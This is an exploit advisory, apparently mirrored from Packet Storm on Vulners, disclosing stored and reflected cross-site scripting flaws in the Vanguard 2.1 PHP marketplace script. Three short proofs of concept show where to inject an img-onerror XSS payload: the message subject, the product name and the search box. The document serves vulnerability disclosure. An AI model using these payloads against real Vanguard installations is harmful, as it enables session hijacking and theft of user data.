Lucene search
K

Vanguard 2.1 Cross Site Scripting

🗓️ 06 Apr 2020 00:00:00Reported by thelastvvvType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 179 Views

Vanguard 2.1 Persistent and Non-Persistent Cross-site Scripting Vulnerabilities in Messages, Product Titles, and Search Bo

Code
`# Exploit Title: Vanguard 2.1 Multi XSS Vunlerabilities  
# Google Dork:N/A  
# Date: 2020-04-04  
# Exploit Author: @ThelastVvV  
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975  
# Version: 2.1  
# Tested on: 5.4.0-4parrot1-amd64  
  
---------------------------------------------------------  
  
  
Summary:  
  
Persistent Cross-site Scripting in message&product title-tags also there's Non-Persistent Cross-site scripting in product search box.  
  
PoC 1:  
  
A- Message  
  
1- create an account on vanguard marketplace  
2- go to send mail   
https://example/mails/new  
  
In the "Object" field type my my preferred payload : "><img src=x onerror=prompt(document.domain);>  
  
3-then choose the target (username ) then hit submit  
4- now go to the mailbox and click on the msg   
https://example/mails/read/1  
  
et voila xssed!  
  
PoC 2:  
  
B:Product  
  
1-go to add new product   
2- In the "Product Name" field type my my preferred payload : "><img src=x onerror=prompt(document.domain);>  
2- now view the product page  
https://example/p/(id)  
3 -click on download in the product page  
https://example/download/(id)  
  
et voila xssed!  
  
PoC 3:  
  
In Products Search box use payload:  
"><img src=x onerror=prompt(document.domain);>  
  
  
Impact:  
XSS can lead to user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical attacks on all users of the product .  
  
Screentshoots:  
  
A -https://imgur.com/jkCfaEh  
B-https://imgur.com/3GuKGJr  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation